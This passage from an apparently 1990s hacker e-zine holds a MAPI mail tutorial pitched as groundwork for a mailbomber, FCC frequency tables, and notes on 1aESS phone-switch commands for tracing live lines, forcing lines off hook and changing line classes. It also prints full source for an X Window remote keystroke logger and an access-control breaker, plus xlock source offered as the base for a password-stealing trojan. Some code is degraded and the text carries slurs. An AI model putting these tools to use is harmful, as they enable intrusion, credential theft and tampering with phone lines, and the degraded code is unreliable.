and Transports. The Message Stores are the messages you have under an inbox,
for example. Just look at Exchange's or Netscape's inbox, and you are looking
at a MAPI Message Store. (Well, Exchange is probably the better example,
since Netscape uses the Internet standards, while Exchange does MAPI and
internet.) The Address Book is a gay little Microslut invention that contains
a list of recipients for messages. (I say gay, because it is a retarded
name.) And finally, the Transport providers are the link between a local
system and the remote systems (i.e. Internet).

Simple MAPI
^^^^^^^^^^^

Ok, Simple MAPI is here to provide us with the functions to establish a MAPI
session, perform messaging functions, and close down the connection.
A list of MAPI Calls

[================================================================]
| Simple MAPI Call             Description                       |
|================================================================|
| MAPILogon                    Log on to service                 |
| MAPILogoff                   Log off from service              |
| MAPIFreeBuffer               Free all allocated memory         |
| MAPISendMail                 Send a piece of mail              |
| MAPISendDocuments            Send file(s) in a message         |
| MAPIFindNext                 Find Messages                     |
| MAPIReadMail                 Get Messages                      |
| MAPISaveMail                 Save Messages                     |
| MAPIDeleteMail               Delete Messages                   |
| MAPIAddress      ----\                                         |
| MAPIDetails      -----\                                        |
| MAPIResolveName              Addressing Specifics              |
|================================================================|

The quickest and easiest way to use Simple MAPI is by using
MAPISendDocuments. You can use this function to create a standard message
with a file attachment (or attachments). The following may not seem too
useful now, but it is a building block for our next part of this infosheet.
Anyway, the example simply embeds your autoexec.bat into a message.

To compile : cl sendauto.c user32.lib

Using MAPISendDocuments:

// Wow look at me! - i'm sendauto.c
#include <windows.h>
#include <mapi.h>

LPMAPISENDDOCUMENTS lpfnMAPISendDocuments;

void SendMsg(HWND hwnd)
{
    // ";" separates entries in the path list and the name list
    (*lpfnMAPISendDocuments)((ULONG)hwnd, ";", "C:\\AUTOEXEC.BAT",
                             "AUTOEXEC.BAT", 0);
    MessageBox(hwnd, "Message Sent", "", MB_OK);
}

LRESULT CALLBACK WndProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    switch (uMsg) {
    case WM_LBUTTONDOWN:            // a left click in the window sends the message
        SendMsg(hwnd);
        break;
    case WM_DESTROY:
        PostQuitMessage(0);
        break;
    default:
        return DefWindowProc(hwnd, uMsg, wParam, lParam);
    }
    return 0;
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                   LPSTR d3, int nCmdShow)
{
    MSG msg;
    HWND hwnd;
    WNDCLASS wndClass;
    HINSTANCE hMAPILib;

    // Simple MAPI is loaded at run time, so check that it is really there
    hMAPILib = LoadLibrary("MAPI32.DLL");
    if (hMAPILib == NULL)
        return FALSE;
    lpfnMAPISendDocuments = (LPMAPISENDDOCUMENTS)GetProcAddress(
                                hMAPILib, "MAPISendDocuments");
    if (lpfnMAPISendDocuments == NULL)
        return FALSE;

    if (hPrevInstance == NULL) {
        memset(&wndClass, 0, sizeof(wndClass));
        wndClass.style = CS_HREDRAW | CS_VREDRAW;
        wndClass.lpfnWndProc = WndProc;
        wndClass.hInstance = hInstance;
        wndClass.hCursor = LoadCursor(NULL, IDC_ARROW);
        wndClass.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
        wndClass.lpszClassName = "HELLO";
        if (!RegisterClass(&wndClass))
            return FALSE;
    }

    hwnd = CreateWindow("HELLO", "HELLO", WS_OVERLAPPEDWINDOW,
                        CW_USEDEFAULT, 0, CW_USEDEFAULT, 0,
                        NULL, NULL, hInstance, NULL);
    ShowWindow(hwnd, nCmdShow);
    UpdateWindow(hwnd);

    while (GetMessage(&msg, NULL, 0, 0))
        DispatchMessage(&msg);

    FreeLibrary(hMAPILib);
    return msg.wParam;
}

MAPISendMail
^^^^^^^^^^^^

A more flexible and easier way to send a message is thru MAPISendMail. With
a few simple calls to the API, and 2 structures, you can create a message
with a recipient and an actual message. Basically, the following code starts
off with creating the structures you need to fill out the message, and it
then calls MAPILogon to log on to the MAPI transport protocol (in this case,
SMTP, since it is internet e-mail), it then sends the message, and logs off
with MAPILogoff. By the way, this is a simple command line program.
mailbill.c
^^^^^^^^^^

// lets mailbill.c (linton) and tell him to get a life
#include <windows.h>
#include <stdio.h>
#include <mapi.h>

LPMAPISENDMAIL lpfnMAPISendMail;
LPMAPILOGON    lpfnMAPILogon;
LPMAPILOGOFF   lpfnMAPILogoff;

// One recipient: reserved, class, display name, address, entry id size, entry id
MapiRecipDesc recipent = { 0, MAPI_TO, "Bill Clinton",
                           "SMTP:president@whitehouse.gov", 0, NULL };

// The message: reserved, subject, body text, then the fields we leave empty,
// and finally the recipient count and list (no attachments)
MapiMessage message = { 0, "Greetings",
    "Bill,\n give up your crazy Communications Decency Act, and your "
    "Clipper Chip project and come out with your hands up!",
    NULL, NULL, NULL, 0, NULL, 1, &recipent, 0, NULL };

int main(void)
{
    LHANDLE lhSession;
    HINSTANCE hMAPILib;

    // Simple MAPI is loaded at run time, so check that it is really there
    hMAPILib = LoadLibrary("MAPI32.DLL");
    if (hMAPILib == NULL) {
        printf("MAPI32.DLL could not be loaded.\n");
        return 1;
    }
    lpfnMAPILogon = (LPMAPILOGON)GetProcAddress(hMAPILib, "MAPILogon");
    lpfnMAPISendMail = (LPMAPISENDMAIL)GetProcAddress(hMAPILib, "MAPISendMail");
    lpfnMAPILogoff = (LPMAPILOGOFF)GetProcAddress(hMAPILib, "MAPILogoff");
    if (!lpfnMAPILogon || !lpfnMAPISendMail || !lpfnMAPILogoff) {
        FreeLibrary(hMAPILib);
        return 1;
    }

    // log on, send the one message, log off
    (*lpfnMAPILogon)(0, NULL, NULL, MAPI_ALLOW_OTHERS, 0, &lhSession);
    (*lpfnMAPISendMail)(lhSession, 0, &message, 0, 0);
    (*lpfnMAPILogoff)(lhSession, 0, 0, 0);
    printf("Message to the White House is sent.\n");

    FreeLibrary(hMAPILib);
    return 0;
}

This program will work best if you already have your ISP connection going,
so start that up first. Oh, and by the way, these are all meant for Visual
C++ 4.0, I don't know how well they compile, or if they compile under 2.0 or
below.

Ok, well this is all for this month, next month I will show you a bit more
about MAPI, and then I will give you the code to the MAPI Mailbomber, which
is what the article is supposed to be all about.
_____________________________________________________________

  -------------------------------
--=[FCC Frequency Allocations]=--
Written by Keystroke
  -------------------------------

FREQUENCY RANGE     ABBREVIATION    CLASSIFICATION
30Hz-300Hz          ELF             Extremely Low frequency
300Hz-3kHz          VF              Voice frequency
3kHz-30kHz          VLF             Very Low frequency
30kHz-300kHz        LF              Low frequency
300kHz-3MHz         MF              Medium frequency
3MHz-30MHz          HF              High frequency
30MHz-300MHz        VHF             Very high frequency
0.3GHz-3GHz         UHF             Ultrahigh frequency
3GHz-30GHz          SHF             Super high frequency
30GHz-300GHz        EHF             Extremely high frequency
0.3THz-4.29THz      IR              Infrared
4.29THz-6.98THz                     Visible Light
6.98THz-100THz      UV              Ultraviolet
100PHz-1000EHz                      X-rays

FREQUENCY (kHz)     ALLOCATIONS
300                 Marine
400                 Aviation
500-1600            AM Radio
2000                Marine, Aviation, and Land Mobile
3000                Amateur, Land Mobile

FREQUENCY (MHZ)     ALLOCATIONS
3                   Marine
4                   Marine
5                   Land Mobile
6                   Marine, Aviation
7                   Amateur, Aviation
8                   Land Mobile
9                   Marine
10                  Marine, Aviation, Shortwave
16                  Aviation, Shortwave
20                  Aviation, Shortwave
30                  Amateur, Land Mobile

FREQUENCY (MHZ)     ALLOCATIONS
30                  Land Mobile, Government
40                  Government
50                  Government
60                  TV Channels 2-4 Broadcast
70                  Aviation R/C
80                  Land Mobile
90                  TV Channels 5-6 Broadcast
100                 FM Broadcast
160                 Amateur Land Mobile
200                 TV Channels 7-13 Broadcast
300                 Government Satellite

TIP: Put a few scanners around your room, tune them to the same TV station,
put your TV on that station, and listen in Surround Sound! :P

FREQUENCY (MHZ)     ALLOCATIONS
300                 Aviation
400                 Government Satellite
500                 General Mobile Radio Service, Land Mobile
600                 TV Channels 14-83 Broadcast
700                 TV Channels 14-83 Broadcast
800                 Land Mobile
900                 Land Mobile
1000                Fixed, Microwaves
1600                Aviation
2000                Fixed
3000                Radar

BUGGING FREQUENCIES!!! - http://www.tscm.com/bugfreq.html

There's a file at file://oak.oakland.edu/pub/hamradio/docs/misc/fcc.allocations
that goes in depth on FCC frequency allocations; the above was a general look
at the frequencies.
Fun Fact #1: A carrier is really a high-frequency signal that is modulated
with a low-frequency information signal. That's why a modem is a
MODulator-DEModulator: it varies the characteristics of the high-frequency
signal in accordance with the changes in the info. signal (this is
modulation) and retrieves the info (low freq.) from the high-frequency
modulated carrier signal (this is demodulation).

Fun Fact #2: kilobyte, megabyte, gigabyte, terabyte, petabyte, exabyte

_____________________________________________________________

  -----------
--=[1aESS]=--
Written by Optimus
  -----------

I got some badass 1aess shit, this is basically just my notes on it all and
some basic need to knows. If it ain't enough for you, you should find
something more technical =). I haven't tested any of this, just passing it
along...

All 1aess commands are typed in caps. Verification commands end in '.' and
change commands end in '!'. The end of line character is ctrl+d not return,
kinda funky, maybe it's the keyboard setup they designed. The backspace key
is underscore.

Basic Commands:

WHO-RV-.                Shows system info
V-STOP-.                Clears pause buffer (press space to pause)
CI-LIST-.               Lists lines currently being traced
NET-LINE-XXXXXXX0000.   Live Line Trace
T-DN-RDXXXXXXX.         Returns 1 if line is busy, 0 if idle
T-DN-MBXXXXXXX.         Forces a line off hook
T-DN-MTXXXXXXX.         Forces a line on hook
OP:CHAN:MON!            Shows channels being monitored
VFY-DN-30XXXXXXX.       Searches for a free fone line
VFY-LEN-4100000000.     Lists Free LENs
VFY-TNN-XXXXXXXX.       Shows trunk info

Adding lines:

RC:LINE:\               Says that you are adding a line
ORD 1\                  Execute immediately
TN XXXXXXX\             The telephone number of this line
LEN XXXXXXXX\           The LEN for the line
LCC 1FR\                Line Class Code (List later)
XXX YYY\                YYY is the ld company
!

Changing a line:

RC:LINE;CHG:\           Says that you are changing a line
ORD 1\                  Execute immediately
TN XXXXXXX\             The line you are changing
LCC DTF\                Changes line to a pay phone
!

LCC Codes:

These are just basic LCC's, there are more that I know about, but they seem
kind of irrelevant

DTF                     Pay phone
1FR                     Flat rate
1MR                     Measured Rate
1PC                     One Pay Phone
PBM                     No ani?
PBX                     What it says
CDF                     DTF Coin pay phone
CFD                     Coinless charge-a-call pay phone
INW                     InWATTS 800

Removing A Line:

RC:LINE;OUT:\           States you are removing a line
ORD 1\                  Says you want to remove it now
TN XXXXXXX\             Number of which you are removing
!

That's basically it, I haven't tested anything so I don't have that much
experience with it but, if you do experiment, drop me a ring telling me how
it went at rewt@null.net

-- Optimus

_____________________________________________________________

  -------------
--=[X-Toolz]=--
Written by lurk3r
  -------------

This article is not a basic how-to-use-Xwin or even a step-by-step guide.
It's just a few scripts and ideas for those who aren't able to find anything
on Xwin and just plain out need a clue. This is also my first article, so
bear with me. It can only get better. I did include the xhost command though,
because it is such a major function.

Basic Command: Enabling the Xhost

$ xhost +

To allow connections from only a single host for whatever reason, such as to
lessen the chances of someone stumbling upon it from just any server, you
would use the command..

$ xhost +

Recommended: man xwd and man xwud (to find out about dumping screens, very
useful) the Xwindows utility.

$ xwd -root localhost:0.0 > SaveFile

Once you've gotten into the server, poked around and decided that you aren't
able to find any way to get root access or other logins, you may want to try
some of these ideas out. A good way to start is to run a program such as a
key recorder; since xwindows are obviously run on the xserver, all
keystrokes go through it.

The first program you may want to set up is xkey.c, written by Dominic
Giampaolo (nick@cs.maxine.wpi.edu).
To compile type: gcc -o xkey xkey.c -lX11 -lm If that doesn't work then your gonna have to RTFM cause I'm not gonna get into a deep discussion on compiling. To run it type: xkey displayname:0 ------------------------------------------------------------ #include #include #include #include #include #include #include char *TranslateKeyCode(XEvent *ev); Display *d; void snoop_all_windows(Window root, unsigned long type) { static int level = 0; Window parent, *children, *child2; unsigned int nchildren; int stat, i,j,k; level++; stat = XQueryTree(d, root, &root, &parent, &children, &nchildren); if (stat == FALSE) { fprintf(stderr, "Can't query window tree...\n"); return; } if (nchildren == 0) return; /* For a more drastic indication of the problem being exploited * here, you can change these calls to XSelectInput() to something * like XClearWindow(d, children[i]) or if you want to be real * nasty, do XKillWindow(d, children[i]). Of course if you do that, * then you'll want to remove the loop in main(). * * The whole point of this exercise being that I shouldn't be * allowed to manipulate resources which do not belong to me. 
*/ XSelectInput(d, root, type); for(i=0; i < nchildren; i++) { XSelectInput(d, children[i], type); snoop_all_windows(children[i], type); } XFree((char *)children); } void main(int argc, char **argv) { char *hostname; char *string; XEvent xev; int count = 0; if (argv[1] == NULL) hostname = ":0"; else hostname = argv[1]; d = XOpenDisplay(hostname); if (d == NULL) { fprintf(stderr, "Blah, can't open display: %s\n", hostname); exit(10); } snoop_all_windows(DefaultRootWindow(d), KeyPressMask); while(1) { XNextEvent(d, &xev); string = TranslateKeyCode(&xev); if (string == NULL) continue; if (*string == '\r') printf("\n"); else if (strlen(string) == 1) printf("%s", string); else printf("<<%s>>", string); fflush(stdout); } } #define KEY_BUFF_SIZE 256 static char key_buff[KEY_BUFF_SIZE]; char *TranslateKeyCode(XEvent *ev) { int count; char *tmp; KeySym ks; if (ev) { count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL); key_buff[count] = '\0'; if (count == 0) { tmp = XKeysymToString(ks); if (tmp) strcpy(key_buff, tmp); else strcpy(key_buff, ""); } return key_buff; } else return NULL; } ------------------------------------------------------------ Since this is a keystroke recorder and not a sniffer, it can be very helpful in finding out about the system you are on, and possibly getting you into other systems that the user at console connects to, such as FTP sites and other shell acounts. I've noticed that alot of students have multiple shells, and like to check their mail on multiple systems through one account. If you're lucky enough to find one of these guys, you'll be set up for a while. Another useful tool that I have used is called crowbar.c. This program can be used after you have a connection to someones display, and say someone decides to "xhost -" you. 
This program will allow you to XDisableAccessControl() ------------------------------------------------------ #include #include #include main (int argc, char *argv[]) { Display *dpy; char *dis = NULL; int c; dis= argv[1]; if ((dpy = XOpenDisplay(dis))==NULL){ perror("could not open window"); exit(0); } while ((c=getchar())!='q') XDisableAccessControl(dpy); XCloseDisplay(dpy); } ------------------------------------------------------------ Another program or thought that may be useful, (if you know how to code) would be to install a trojan or trick to get peoples passwords from them. One thing that most people might not think anything about when they sit down at their desk at school or work is when they see a screen saver on. If you've ever been into a place that has lots of computers, even after they have closed for the night you will notice that at least 70% of them are left on with just a screen saver running. So why not edit the GetPassword routine of the screensaver program to capture the passwords that people enter? Anyone seeing the process table won't think twice when they see the screensaver program running. You'll have to go through and edit this yourself, or in the future maybe I or another person in HBS can provide one, but here is the code for the screensaver that I have found to be the most widely used. 
Xlock.c ------------------------------------------------------------ #include #include #include #include #include "xlock.h" #include #include extern char *crypt(); extern char *getenv(); char *ProgramName; /* argv[0] */ perscreen Scr[MAXSCREENS]; Display *dsp = NULL; /* server display connection */ int screen; /* current screen */ void (*callback) () = NULL; void (*init) () = NULL; static int screens; /* number of screens */ static Window win[MAXSCREENS]; /* window used to cover screen */ static Window icon[MAXSCREENS]; /* window used during password typein */ static Window root[MAXSCREENS]; /* convenience pointer to the root window */ static GC textgc[MAXSCREENS]; /* grphx context used for text rendering */ static long fgcol[MAXSCREENS]; /* used for text rendering */ static long bgcol[MAXSCREENS]; /* background of text screen */ static int iconx[MAXSCREENS]; /* location of left edge of icon */ static int icony[MAXSCREENS]; /* location of top edge of icon */ static Cursor mycursor; /* blank cursor */ static Pixmap lockc; static Pixmap lockm; /* pixmaps for cursor and mask */ static char no_bits[] = {0}; /* dummy array for the blank cursor */ static int passx; /* position of the ?'s */ static int passy; static XFontStruct *font; static int sstimeout; /* screen saver parameters */ static int ssinterval; static int ssblanking; static int ssexposures; #define PASSLENGTH 20 #define FALLBACK_FONTNAME "fixed" #define ICONW 64 #define ICONH 64 #define AllPointerEventMask \ (ButtonPressMask | ButtonReleaseMask | \ EnterWindowMask | LeaveWindowMask | \ PointerMotionMask | PointerMotionHintMask | \ Button1MotionMask | Button2MotionMask | \ Button3MotionMask | Button4MotionMask | \ Button5MotionMask | ButtonMotionMask | \ KeymapStateMask) /* VARARGS1 */ void error(s1, s2) char *s1, *s2; { fprintf(stderr, s1, ProgramName, s2); exit(1); } /* * Server access control support. 
*/ static XHostAddress *XHosts; /* the list of "friendly" client machines */ static int HostAccessCount; /* the number of machines in XHosts */ static Bool HostAccessState; /* whether or not we even look at the list */ static void XGrabHosts(dsp) Display *dsp; { XHosts = XListHosts(dsp, &HostAccessCount, &HostAccessState); if (XHosts) XRemoveHosts(dsp, XHosts, HostAccessCount); XEnableAccessControl(dsp); } static void XUngrabHosts(dsp) Display *dsp; { if (XHosts) { XAddHosts(dsp, XHosts, HostAccessCount); XFree((char *) XHosts); } if (HostAccessState == False) XDisableAccessControl(dsp); } /* * Simple wrapper to get an asynchronous grab on the keyboard and mouse. * If either grab fails, we sleep for one second and try again since some * window manager might have had the mouse grabbed to drive the menu choice * that picked "Lock Screen..". If either one fails the second time we print * an error message and exit. */ static void GrabKeyboardAndMouse() { Status status; status = XGrabKeyboard(dsp, win[0], True, GrabModeAsync, GrabModeAsync, CurrentTime); if (status != GrabSuccess) { sleep(1); status = XGrabKeyboard(dsp, win[0], True, GrabModeAsync, GrabModeAsync, CurrentTime); if (status != GrabSuccess) error("%s: couldn't grab keyboard! (%d)\n", status); } status = XGrabPointer(dsp, win[0], True, AllPointerEventMask, GrabModeAsync, GrabModeAsync, None, mycursor, CurrentTime); if (status != GrabSuccess) { sleep(1); status = XGrabPointer(dsp, win[0], True, AllPointerEventMask, GrabModeAsync, GrabModeAsync, None, mycursor, CurrentTime); if (status != GrabSuccess) error("%s: couldn't grab pointer! (%d)\n", status); } } /* * Assuming that we already have an asynch grab on the pointer, * just grab it again with a new cursor shape and ignore the return code. 
*/ static void XChangeGrabbedCursor(cursor) Cursor cursor; { #ifndef DEBUG (void) XGrabPointer(dsp, win[0], True, AllPointerEventMask, GrabModeAsync, GrabModeAsync, None, cursor, CurrentTime); #endif } /* * Restore all grabs, reset screensaver, restore colormap, close connection. */ static void finish() { XSync(dsp, False); if (!nolock && !allowaccess) XUngrabHosts(dsp); XUngrabPointer(dsp, CurrentTime); XUngrabKeyboard(dsp, CurrentTime); if (!enablesaver) XSetScreenSaver(dsp, sstimeout, ssinterval, ssblanking, ssexposures); XFlush(dsp); XCloseDisplay(dsp); } static int ReadXString(s, slen) char *s; int slen; { XEvent event; char keystr[20]; char c; int i; int bp; int len; int thisscreen = screen; char pwbuf[PASSLENGTH]; for (screen = 0; screen < screens; screen++) if (thisscreen == screen) init(icon[screen]); else init(win[screen]); bp = 0; *s = 0; while (True) { unsigned long lasteventtime = seconds(); while (!XPending(dsp)) { for (screen = 0; screen < screens; screen++) if (thisscreen == screen) callback(icon[screen]); else callback(win[screen]); XFlush(dsp); usleep(delay); if (seconds() - lasteventtime > timeout) { screen = thisscreen; return 1; } } screen = thisscreen; XNextEvent(dsp, &event); switch (event.type) { case KeyPress: len = XLookupString((XKeyEvent *) & event, keystr, 20, NULL, NULL); for (i = 0; i < len; i++) { c = keystr[i]; switch (c) { case 8: /* ^H */ case 127: /* DEL */ if (bp > 0) bp--; break; case 10: /* ^J */ case 13: /* ^M */ s[bp] = '\0'; return 0; case 21: /* ^U */ bp = 0; break; default: s[bp] = c; if (bp < slen - 1) bp++; else XSync(dsp, True); /* flush input buffer */ } } XSetForeground(dsp, Scr[screen].gc, bgcol[screen]); if (echokeys) { memset(pwbuf, '?', slen); XFillRectangle(dsp, win[screen], Scr[screen].gc, passx, passy - font->ascent, XTextWidth(font, pwbuf, slen), font->ascent + font->descent); XDrawString(dsp, win[screen], textgc[screen], passx, passy, pwbuf, bp); } /* * eat all events if there are more than enough pending... 
this * keeps the Xlib event buffer from growing larger than all * available memory and crashing xlock. */ if (XPending(dsp) > 100) { /* 100 is arbitrarily big enough */ register Status status; do { status = XCheckMaskEvent(dsp, KeyPressMask | KeyReleaseMask, &event); } while (status); XBell(dsp, 100); } break; case ButtonPress: if (((XButtonEvent *) & event)->window == icon[screen]) { return 1; } break; case VisibilityNotify: if (event.xvisibility.state != VisibilityUnobscured) { #ifndef DEBUG XRaiseWindow(dsp, win[screen]); #endif s[0] = '\0'; return 1; } break; case KeymapNotify: case KeyRelease: case ButtonRelease: case MotionNotify: case LeaveNotify: case EnterNotify: break; default: fprintf(stderr, "%s: unexpected event: %d\n", ProgramName, event.type); break; } } } static int getPassword() { char buffer[PASSLENGTH]; char userpass[PASSLENGTH]; char rootpass[PASSLENGTH]; char *user; XWindowAttributes xgwa; int y, left, done; struct passwd *pw; pw = getpwnam("root"); strcpy(rootpass, pw->pw_passwd); pw = getpwnam(cuserid(NULL)); strcpy(userpass, pw->pw_passwd); user = pw->pw_name; XGetWindowAttributes(dsp, win[screen], &xgwa); XChangeGrabbedCursor(XCreateFontCursor(dsp, XC_left_ptr)); XSetForeground(dsp, Scr[screen].gc, bgcol[screen]); XFillRectangle(dsp, win[screen], Scr[screen].gc, 0, 0, xgwa.width, xgwa.height); XMapWindow(dsp, icon[screen]); XRaiseWindow(dsp, icon[screen]); left = iconx[screen] + ICONW + font->max_bounds.width; y = icony[screen] + font->ascent; XDrawString(dsp, win[screen], textgc[screen], left, y, text_name, strlen(text_name)); XDrawString(dsp, win[screen], textgc[screen], left + 1, y, text_name, strlen(text_name)); XDrawString(dsp, win[screen], textgc[screen], left + XTextWidth(font, text_name, strlen(text_name)), y, user, strlen(user)); y += font->ascent + font->descent + 2; XDrawString(dsp, win[screen], textgc[screen], left, y, text_pass, strlen(text_pass)); XDrawString(dsp, win[screen], textgc[screen], left + 1, y, text_pass, 
strlen(text_pass)); passx = left + 1 + XTextWidth(font, text_pass, strlen(text_pass)) + XTextWidth(font, " ", 1); passy = y; y = icony[screen] + ICONH + font->ascent + 2; XDrawString(dsp, win[screen], textgc[screen], iconx[screen], y, text_info, strlen(text_info)); XFlush(dsp); y += font->ascent + font->descent + 2; done = False; while (!done) { if (ReadXString(buffer, PASSLENGTH)) break; /* * we don't allow for root to have no password, but we handle the case * where the user has no password correctly; they have to hit return * only */ done = !((strcmp(crypt(buffer, userpass), userpass)) && (!allowroot || strcmp(crypt(buffer, rootpass), rootpass))); if (!done && *buffer == NULL) { /* just hit return, and it wasn't his password */ break; } if (*userpass == NULL && *buffer != NULL) { /* * the user has no password, but something was typed anyway. * sounds fishy: don't let him in... */ done = False; } /* clear plaintext password so you can't grunge around /dev/kmem */ memset(buffer, 0, sizeof(buffer)); XSetForeground(dsp, Scr[screen].gc, bgcol[screen]); XFillRectangle(dsp, win[screen], Scr[screen].gc, iconx[screen], y - font->ascent, XTextWidth(font, text_invalid, strlen(text_invalid)), font->ascent + font->descent + 2); XDrawString(dsp, win[screen], textgc[screen], iconx[screen], y, text_valid, strlen(text_valid)); if (done) return 0; else { XSync(dsp, True); /* flush input buffer */ sleep(1); XFillRectangle(dsp, win[screen], Scr[screen].gc, iconx[screen], y - font->ascent, XTextWidth(font, text_valid, strlen(text_valid)), font->ascent + font->descent + 2); XDrawString(dsp, win[screen], textgc[screen], iconx[screen], y, text_invalid, strlen(text_invalid)); if (echokeys) /* erase old echo */ XFillRectangle(dsp, win[screen], Scr[screen].gc, passx, passy - font->ascent, xgwa.width - passx, font->ascent + font->descent); } } XChangeGrabbedCursor(mycursor); XUnmapWindow(dsp, icon[screen]); return 1; } static void justDisplay() { XEvent event; for (screen = 0; screen < 
screens; screen++)
        init(win[screen]);
    do {
        while (!XPending(dsp)) {
            for (screen = 0; screen < screens; screen++)
                callback(win[screen]);
            XFlush(dsp);
            usleep(delay);
        }
        XNextEvent(dsp, &event);
#ifndef DEBUG
        if (event.type == VisibilityNotify)
            XRaiseWindow(dsp, event.xany.window);
#endif
    } while (event.type != ButtonPress && event.type != KeyPress);

    for (screen = 0; screen < screens; screen++)
        if (event.xbutton.root == RootWindow(dsp, screen))
            break;
    if (usefirst)
        XPutBackEvent(dsp, &event);
}

static void
sigcatch()
{
    finish();
    error("%s: caught terminate signal.\nAccess control list restored.\n");
}

static void
lockDisplay()
{
    if (!allowaccess) {
#ifdef SYSV
        sigset_t    oldsigmask;
        sigset_t    newsigmask;

        sigemptyset(&newsigmask);
        sigaddset(&newsigmask, SIGHUP);
        sigaddset(&newsigmask, SIGINT);
        sigaddset(&newsigmask, SIGQUIT);
        sigaddset(&newsigmask, SIGTERM);
        sigprocmask(SIG_BLOCK, &newsigmask, &oldsigmask);
#else
        int         oldsigmask;

        oldsigmask = sigblock(sigmask(SIGHUP) |
                              sigmask(SIGINT) |
                              sigmask(SIGQUIT) |
                              sigmask(SIGTERM));
#endif

        signal(SIGHUP, (void (*) ()) sigcatch);
        signal(SIGINT, (void (*) ()) sigcatch);
        signal(SIGQUIT, (void (*) ()) sigcatch);
        signal(SIGTERM, (void (*) ()) sigcatch);

        XGrabHosts(dsp);

#ifdef SYSV
        sigprocmask(SIG_SETMASK, &oldsigmask, &oldsigmask);
#else
        sigsetmask(oldsigmask);
#endif
    }
    do {
        justDisplay();
    } while (getPassword());
}

long
allocpixel(cmap, name, def)
    Colormap    cmap;
    char       *name;
    char       *def;
{
    XColor      col;
    XColor      tmp;

    XParseColor(dsp, cmap, name, &col);
    if (!XAllocColor(dsp, cmap, &col)) {
        fprintf(stderr, "couldn't allocate: %s, using %s instead\n",
                name, def);
        XAllocNamedColor(dsp, cmap, def, &col, &tmp);
    }
    return col.pixel;
}

int
main(argc, argv)
    int         argc;
    char       *argv[];
{
    XSetWindowAttributes xswa;
    XGCValues   xgcv;
    XColor      nullcolor;

    ProgramName = strrchr(argv[0], '/');
    if (ProgramName)
        ProgramName++;
    else
        ProgramName = argv[0];

    srandom(time((long *) 0));  /* random mode needs the seed set. */

    GetResources(argc, argv);

    CheckResources();

    font = XLoadQueryFont(dsp, fontname);
    if (font == NULL) {
        fprintf(stderr, "%s: can't find font: %s, using %s...\n",
                ProgramName, fontname, FALLBACK_FONTNAME);
        font = XLoadQueryFont(dsp, FALLBACK_FONTNAME);
        if (font == NULL)
            error("%s: can't even find %s!!!\n", FALLBACK_FONTNAME);
    }
    screens = ScreenCount(dsp);
    if (screens > MAXSCREENS)
        error("%s: can only support %d screens.\n", MAXSCREENS);
    for (screen = 0; screen < screens; screen++) {
        Screen     *scr = ScreenOfDisplay(dsp, screen);
        Colormap    cmap = DefaultColormapOfScreen(scr);

        root[screen] = RootWindowOfScreen(scr);
        bgcol[screen] = allocpixel(cmap, background, "White");
        fgcol[screen] = allocpixel(cmap, foreground, "Black");

        if (mono || CellsOfScreen(scr) == 2) {
            Scr[screen].pixels[0] = fgcol[screen];
            Scr[screen].pixels[1] = bgcol[screen];
            Scr[screen].npixels = 2;
        } else {
            int         colorcount = NUMCOLORS;
            u_char      red[NUMCOLORS];
            u_char      green[NUMCOLORS];
            u_char      blue[NUMCOLORS];
            int         i;

            hsbramp(0.0, saturation, 1.0, 1.0, saturation, 1.0, colorcount,
                    red, green, blue);
            Scr[screen].npixels = 0;
            for (i = 0; i < colorcount; i++) {
                XColor      xcolor;

                xcolor.red = red[i] << 8;
                xcolor.green = green[i] << 8;
                xcolor.blue = blue[i] << 8;
                xcolor.flags = DoRed | DoGreen | DoBlue;

                if (!XAllocColor(dsp, cmap, &xcolor))
                    break;

                Scr[screen].pixels[i] = xcolor.pixel;
                Scr[screen].npixels++;
            }
            if (verbose)
                fprintf(stderr, "%d pixels allocated\n", Scr[screen].npixels);
        }

        xswa.override_redirect = True;
        xswa.background_pixel = BlackPixelOfScreen(scr);
        xswa.event_mask = KeyPressMask | ButtonPressMask | VisibilityChangeMask;

#ifdef DEBUG
#define WIDTH WidthOfScreen(scr) - 100
#define HEIGHT HeightOfScreen(scr) - 100
#define CWMASK CWBackPixel | CWEventMask
#else
#define WIDTH WidthOfScreen(scr)
#define HEIGHT HeightOfScreen(scr)
#define CWMASK CWOverrideRedirect | CWBackPixel | CWEventMask
#endif

        win[screen] = XCreateWindow(dsp, root[screen], 0, 0, WIDTH, HEIGHT, 0,
                                    CopyFromParent, InputOutput,
                                    CopyFromParent, CWMASK, &xswa);

#ifdef DEBUG
        {
            XWMHints    xwmh;

            xwmh.flags = InputHint;
            xwmh.input = True;
            XChangeProperty(dsp, win[screen],
                            XA_WM_HINTS, XA_WM_HINTS, 32, PropModeReplace,
                            (unsigned char *) &xwmh,
                            sizeof(xwmh) / sizeof(int));
        }
#endif

        iconx[screen] = (DisplayWidth(dsp, screen) -
                         XTextWidth(font, text_info, strlen(text_info))) / 2;

        icony[screen] = DisplayHeight(dsp, screen) / 6;

        xswa.border_pixel = fgcol[screen];
        xswa.background_pixel = bgcol[screen];
        xswa.event_mask = ButtonPressMask;
#define CIMASK CWBorderPixel | CWBackPixel | CWEventMask
        icon[screen] = XCreateWindow(dsp, win[screen],
                                     iconx[screen], icony[screen],
                                     ICONW, ICONH, 1, CopyFromParent,
                                     InputOutput, CopyFromParent,
                                     CIMASK, &xswa);

        XMapWindow(dsp, win[screen]);
        XRaiseWindow(dsp, win[screen]);

        xgcv.foreground = WhitePixelOfScreen(scr);
        xgcv.background = BlackPixelOfScreen(scr);
        Scr[screen].gc = XCreateGC(dsp, win[screen],
                                   GCForeground | GCBackground, &xgcv);

        xgcv.foreground = fgcol[screen];
        xgcv.background = bgcol[screen];
        xgcv.font = font->fid;
        textgc[screen] = XCreateGC(dsp, win[screen],
                                   GCFont | GCForeground | GCBackground,
                                   &xgcv);
    }
    lockc = XCreateBitmapFromData(dsp, root[0], no_bits, 1, 1);
    lockm = XCreateBitmapFromData(dsp, root[0], no_bits, 1, 1);
    mycursor = XCreatePixmapCursor(dsp, lockc, lockm,
                                   &nullcolor, &nullcolor, 0, 0);
    XFreePixmap(dsp, lockc);
    XFreePixmap(dsp, lockm);

    if (!enablesaver) {
        XGetScreenSaver(dsp, &sstimeout, &ssinterval,
                        &ssblanking, &ssexposures);
        XSetScreenSaver(dsp, 0, 0, 0, 0);       /* disable screen saver */
    }
